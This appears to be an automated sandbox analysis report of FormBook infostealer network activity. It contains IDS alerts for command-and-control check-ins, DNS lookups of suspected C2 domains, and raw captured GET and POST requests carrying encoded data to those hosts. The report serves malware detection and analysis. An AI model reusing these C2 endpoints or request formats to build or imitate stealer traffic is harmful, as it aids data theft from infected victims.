                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 156.237.132.251:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50053 -> 156.237.132.251:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 199.115.118.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 104.21.44.136:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50060 -> 5.83.145.167:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49999 -> 185.173.109.83:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 199.115.118.7:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50041 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49964 -> 185.173.109.83:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50049 -> 104.21.44.136:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 69.57.163.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50037 -> 69.57.163.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50045 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 156.237.132.251:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 46.30.215.152:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50055 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50017 -> 185.173.109.83:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50059 -> 5.83.145.167:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 69.57.163.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 104.21.64.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 104.21.44.136:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50057 -> 192.186.58.31:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50061 -> 5.83.145.167:80
                Source: Joe Sandbox ViewIP Address: 46.30.215.152 46.30.215.152
                Source: Joe Sandbox ViewIP Address: 156.237.132.251 156.237.132.251
                Source: Joe Sandbox ViewIP Address: 185.173.109.83 185.173.109.83
                Source: Joe Sandbox ViewASN Name: PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /087f/?ZP=/+VApexTt9HOM++RKmw+x7XhAmrh5AGR+3H+x2bofqLK9hQM6vFBwOGgAi+X2fqxwQ1ou54V0To7YzjBsLnKZvCBIGUhZnAjqNVo8DcY64ESqyhjcvxB7dQ=&YnL=Ot48Lz5hB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.svapo-discount.netConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)
                Source: global trafficHTTP traffic detected: GET /e5yq/?ZP=qOrZstQLFDjY35ndIf8HNwRY4Ni50oKgJ8RKiFMCPEpMfwSIp+9fX8hV8WV1bGk5WTdqofzLYsp5dIdRWJOxv5nzvIeC3Idshd1T15pSignqMliBkoqmKSw=&YnL=Ot48Lz5hB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.cloud-kuprof2.clickConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)
                Source: global trafficHTTP traffic detected: GET /ofh9/?YnL=Ot48Lz5hB&ZP=I/AIQBt91SjjmW7PvYlPxJnIsM8wtAJHrPjx2aa3mfwI96xGBmPDj2/DwTy54di9LqgvRJSdMBi+4aDHnMP/o/U8KeIVZc/3mm8Ip6rzd+EImySMqitr+Bo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.us-urbanservices.netConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)
                Source: global trafficHTTP traffic detected: GET /kgly/?ZP=kHDPjHSCTDWze2Vg0phbcdc8XCc7+kCIRy913+LiUFBZ8mPBixNUQSiJEIiDfqrU3isfO7fPRYrN7NcK+TCjNZzrBmuXRs7M2o5Nfr+MDV1VuiI9G4W3FVI=&YnL=Ot48Lz5hB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.mercadoacheaqui.shopConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)
                Source: global trafficHTTP traffic detected: GET /ini7/?YnL=Ot48Lz5hB&ZP=/V2dyBCQIymRdW2VQvoZFOZ1J4K3jHtGHoD/v1zIccSKXBD/u3m45o6n66wne4dGny1GEU0lVgybrccvYzwuaDAHN253csBAx11IVidMrbDvCTyU2d9OO6c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.stellaritemvault.shopConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)
                Source: global trafficHTTP traffic detected: GET /a03a/?ZP=gbpm5i4mjdRTpsD7rkyqVa2kXWG0dJEn7tndTt/1ptPJXhelYHvIT1+xODcd4J5R/UoIEMhQotvXyQcGtLdddeAp1PGxsj9JH9CV9Nl6XvQecgYWVTzrsjY=&YnL=Ot48Lz5hB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.happywines.onlineConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)
                Source: global trafficHTTP traffic detected: GET /t3l4/?ZP=CqVVwb5DlZToVuaglBlmuKR8ExKJuDjA0dR9MIf9fL3xEv5xNjwQwR2wua7EvEEUK9CYQvrPGqXpozJhpuTX78Rx4doTB18pAW4Io9x7XFlu/rkYB1FVitA=&YnL=Ot48Lz5hB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.shlomi.appConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)
                Source: global trafficHTTP traffic detected: GET /3nup/?YnL=Ot48Lz5hB&ZP=rNM/wfGF14Fuulua4P+QY+E+9qfUBHDtgTiJjwj3M/Lm0YrEjUDt6p3+e6U9/DwvX9G7HUuqFaHLejiZVT9fZR2QGo3NL1Cv6EUCHFPEojjho5TcdVttbMI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.primeibes.liveConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)
                Source: global trafficHTTP traffic detected: GET /fxnj/?ZP=45DZWeiZa1ODYTtbqhRqm74dRzAAHVDzV9s5mfr3FiPg/2r7aObd3rRaXNXIBqZao+bAnByotP/DyAd3Ub73ejxg+gm6ONrWwQXsyY2H9ffMxZ5VMCLjWxA=&YnL=Ot48Lz5hB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.timeinsardinia.infoConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)
                Source: global trafficHTTP traffic detected: GET /jhy6/?ZP=r3p6owiIh2ORZTDJhqgFdcmQOZrIlglU1I0QmbdNDMZxDSfHmNEQkytjyV6hp+eE5B+UZNRsSifc+xSLDJDUHT3grN0HbnkYWYc1MbgIWydkmatp8C2bAHs=&YnL=Ot48Lz5hB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.epdemexi.latConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)
                Source: global trafficHTTP traffic detected: GET /kaxq/?ZP=k5L6+sXwp1twjCX/+ic5KAS88nxNdigoaKporpdbXy3geJrdOKcHCbRSO7udiXi3ZfVDoDxsTYJ2hvQZYkSpZZv8wQAp740dmlIED7C2ab24QdmJwpSX3kA=&YnL=Ot48Lz5hB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.rtphajar4d.artConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)
                Source: global trafficHTTP traffic detected: GET /39j7/?YnL=Ot48Lz5hB&ZP=irqk8Ruy0NHuclgN3k50TRe4oakVgBy0QV4gt0w89tt228L+yHV3xfQ+cTMSAEzqpMnZS5AKj3b8dAcHexFsLOLRV81Qc5No1u1Z3Z7L76U6eOeuBx81gLk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.charge33.worldConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)
                Source: global trafficHTTP traffic detected: GET /rpa8/?ZP=aaL5v5cJ0iOT+oy0172QyB3lZfQx0dos/Ive+7H31bsM9C22tfF5jf7OJH1svFJzXvgYIuSI0fA9TYsgi9T5XzFl2yZo/A3XymPdZ6FoCRu8gArUwNGAEsk=&YnL=Ot48Lz5hB HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.choujiezhibo.netConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)
                Source: global trafficHTTP traffic detected: GET /54c9/?YnL=Ot48Lz5hB&ZP=2xrBThhS8fGNSn1wz0+Ou/PZhd9qDMyUdMjP4m6JfkgeXHJdNi5QkP1gNum+786tmq5d3W1cCWFHQvBkoKcFHZExH9PEGYrHXmA0rTpn+bD/9zs3hW7R2qY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.tsd2.netConnection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)
                Source: global trafficDNS traffic detected: DNS query: www.svapo-discount.net
                Source: global trafficDNS traffic detected: DNS query: www.cloud-kuprof2.click
                Source: global trafficDNS traffic detected: DNS query: www.us-urbanservices.net
                Source: global trafficDNS traffic detected: DNS query: www.mercadoacheaqui.shop
                Source: global trafficDNS traffic detected: DNS query: www.stellaritemvault.shop
                Source: global trafficDNS traffic detected: DNS query: www.happywines.online
                Source: global trafficDNS traffic detected: DNS query: www.avisos-bbva.info
                Source: global trafficDNS traffic detected: DNS query: www.shlomi.app
                Source: global trafficDNS traffic detected: DNS query: www.primeibes.live
                Source: global trafficDNS traffic detected: DNS query: www.timeinsardinia.info
                Source: global trafficDNS traffic detected: DNS query: www.epdemexi.lat
                Source: global trafficDNS traffic detected: DNS query: www.rtphajar4d.art
                Source: global trafficDNS traffic detected: DNS query: www.charge33.world
                Source: global trafficDNS traffic detected: DNS query: www.choujiezhibo.net
                Source: global trafficDNS traffic detected: DNS query: www.tsd2.net
                Source: unknownHTTP traffic detected: POST /e5yq/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-usHost: www.cloud-kuprof2.clickOrigin: http://www.cloud-kuprof2.clickReferer: http://www.cloud-kuprof2.click/e5yq/Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUS)Data Raw: 5a 50 3d 6e 4d 44 35 76 64 63 46 4b 52 50 79 70 70 72 45 42 39 34 37 4b 31 31 64 68 63 79 36 7a 71 4b 46 44 36 59 33 33 42 56 44 42 55 31 6a 58 56 6d 4b 32 38 68 4f 53 5a 6f 77 38 51 64 7a 56 48 74 6e 54 48 52 6d 75 36 58 49 4e 2b 31 44 4e 63 42 77 55 37 36 2f 79 50 54 57 6d 35 6d 49 71 49 38 53 36 64 73 35 7a 4a 78 55 36 31 65 50 42 43 66 67 6c 38 69 34 4a 42 49 6b 6a 77 44 37 73 4e 4d 55 6c 67 4d 45 4e 66 53 30 39 48 4a 39 70 4f 4c 49 50 47 56 2f 75 69 65 68 34 57 4d 77 52 65 2f 63 32 32 58 44 6b 65 50 33 38 30 45 6c 4a 4d 71 6e 4d 30 48 41 56 62 4a 6d 74 30 57 4f 67 77 74 54 52 77 3d 3d Data Ascii: ZP=nMD5vdcFKRPypprEB947K11dhcy6zqKFD6Y33BVDBU1jXVmK28hOSZow8QdzVHtnTHRmu6XIN+1DNcBwU76/yPTWm5mIqI8S6ds5zJxU61ePBCfgl8i4JBIkjwD7sNMUlgMENfS09HJ9pOLIPGV/uieh4WMwRe/c22XDkeP380ElJMqnM0HAVbJmt0WOgwtTRw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 04:06:52 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 38 37 66 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /087f/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 18 Feb 2025 04:07:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 5b 8a a7 90 8b 54 f0 a0 17 bf 20 75 d7 26 90 6e 24 46 b0 7f 6f aa 2d 88 67 8f 1e 77 f6 cd 30 8c b2 a9 f7 7a b9 50 96 0c 6a 95 5c f2 a4 eb 75 0d c7 90 60 17 ee 8c 4a be 45 25 5f 48 46 db 80 c3 68 39 13 27 8a 5a d9 f2 db 91 15 25 a7 f7 98 9d a1 e9 e2 ce f1 43 96 45 b5 29 aa 4f 44 ce a1 72 2e b4 12 02 0c 5c 0d a2 e3 0e 52 00 74 37 d3 7a 82 c3 69 df 80 61 84 ad 8d a1 27 b8 44 47 8c 7e 00 8a 31 c4 ec e8 08 84 18 0b fe 23 7e b9 c5 13 fc 4c ac 1f 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@[T u&n$Fo-gw0zPj\u`JE%_HFh9'Z%CE)ODr.\Rt7zia'DG~1#~L+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 18 Feb 2025 04:07:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 5b 8a a7 90 8b 54 f0 a0 17 bf 20 75 d7 26 90 6e 24 46 b0 7f 6f aa 2d 88 67 8f 1e 77 f6 cd 30 8c b2 a9 f7 7a b9 50 96 0c 6a 95 5c f2 a4 eb 75 0d c7 90 60 17 ee 8c 4a be 45 25 5f 48 46 db 80 c3 68 39 13 27 8a 5a d9 f2 db 91 15 25 a7 f7 98 9d a1 e9 e2 ce f1 43 96 45 b5 29 aa 4f 44 ce a1 72 2e b4 12 02 0c 5c 0d a2 e3 0e 52 00 74 37 d3 7a 82 c3 69 df 80 61 84 ad 8d a1 27 b8 44 47 8c 7e 00 8a 31 c4 ec e8 08 84 18 0b fe 23 7e b9 c5 13 fc 4c ac 1f 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@[T u&n$Fo-gw0zPj\u`JE%_HFh9'Z%CE)ODr.\Rt7zia'DG~1#~L+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 18 Feb 2025 04:07:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 62 31 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 c1 0a c2 30 10 44 ef 82 ff b0 7e 40 1a 5b 8a a7 90 8b 54 f0 a0 17 bf 20 75 d7 26 90 6e 24 46 b0 7f 6f aa 2d 88 67 8f 1e 77 f6 cd 30 8c b2 a9 f7 7a b9 50 96 0c 6a 95 5c f2 a4 eb 75 0d c7 90 60 17 ee 8c 4a be 45 25 5f 48 46 db 80 c3 68 39 13 27 8a 5a d9 f2 db 91 15 25 a7 f7 98 9d a1 e9 e2 ce f1 43 96 45 b5 29 aa 4f 44 ce a1 72 2e b4 12 02 0c 5c 0d a2 e3 0e 52 00 74 37 d3 7a 82 c3 69 df 80 61 84 ad 8d a1 27 b8 44 47 8c 7e 00 8a 31 c4 ec e8 08 84 18 0b fe 23 7e b9 c5 13 fc 4c ac 1f 2b 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: b10D~@[T u&n$Fo-gw0zPj\u`JE%_HFh9'Z%CE)ODr.\Rt7zia'DG~1#~L+0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.2Date: Tue, 18 Feb 2025 04:07:16 GMTContent-Type: text/htmlContent-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service Unavailabledate: Tue, 18 Feb 2025 04:07:21 GMTserver: Apacheupgrade: h2connection: Upgradelast-modified: Tue, 26 Nov 2024 17:03:01 GMTetag: "111c-627d3d260e1f6-gzip"accept-ranges: bytesvary: Accept-Encodingcontent-encoding: gzipcontent-length: 1574content-type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 c5 58 eb 6e db 36 14 fe df a7 e0 34 14 6b 00 4b 96 ed 64 49 24 db db b0 ae c0 7e 14 6d d1 0e db b0 0d 05 25 1d 49 5c 28 51 23 e9 d8 ae e0 07 ca 73 e4 c5 76 a8 8b 4d 5f 92 14 e8 8f 22 b0 65 91 87 3c b7 ef 7c 3c cc f4 9b 97 6f 7e fe f0 e7 db 5f 48 ae 0b 3e 7f 36 35 0f c2 69 99 cd 9c 54 3a 66 00 68 82 8f 02 34 25 71 4e a5 02 3d 73 7e fb f0 ca bd 32 b3 9a 69 0e f3 f7 4c 03 81 92 14 94 95 1a 4a 5a c6 30 1d b6 53 dd ca 92 16 30 73 12 50 b1 64 95 66 a2 74 48 2c 8c 2c 6e e6 ec 0b 65 50 82 a4 5a 48 4b 24 17 4a b3 32 73 2b 9a 81 1b 2d 18 4f 40 1e 2c bb 65 b0 ac 84 d4 d6 aa 25 4b 74 3e 4b e0 96 c5 e0 36 2f 03 c2 4a a6 19 e5 ae 8a 29 87 d9 e8 60 13 91 05 0b c9 6d c5 5a 57 c1 70 58 8e 47 5c ff 1b 15 ab b5 f2 2a 09 46 97 c7 ca 54 14 b4 64 f4 c6 5b 42 a4 30 04 43 6b cc b5 62 e1 99 a0 1e 6b e2 c2 d8 60 29 4b 0f 7d 42 21 bd ae 6c 91 4e d3 09 39 13 6d 4b f0 44 4a 8e 17 7d 56 3e 4c 4c aa 84 6a 48 3e 6a 56 d8 3a 46 97 93 f1 f7 e7 fe c5 55 13 46 ce ca 1b 22 81 cf 1c a5 d7 1c 54 0e 80 c9 c8 25 a4 6d 18 15 c6 91 2a 84 8f f2 14 66 17 33 69 87 30 16 c5 30 c5 8d 55 f3 ed d2 25 28 51 c0 f0 dc 9b 78 fe 30 56 fb c3 5e c1 4a 0f 07 3f 57 6d b3 b1 97 09 91 71 a0 15 53 8d 36 5c ff 43 4a 0b c6 d7 b3 37 15 46 ea 3d 2d 9b 0d 9b 6d e6 cf 4c ce 06 91 48 d6 75 0e 2c cb 75 30 f2 fd e7 61 45 93 04 81 18 f8 61 41 65 c6 ca c0 df 78 06 94 75 25 30 2f 18 c7 00 4d a1 9a dd 42 98 30 55 71 ba 0e 34 8d 38 84 cd b7 8b ef 62 a1 83 94 ad 20 09 1b 44 b6 db da 2a d0 21 70 bb 81 52 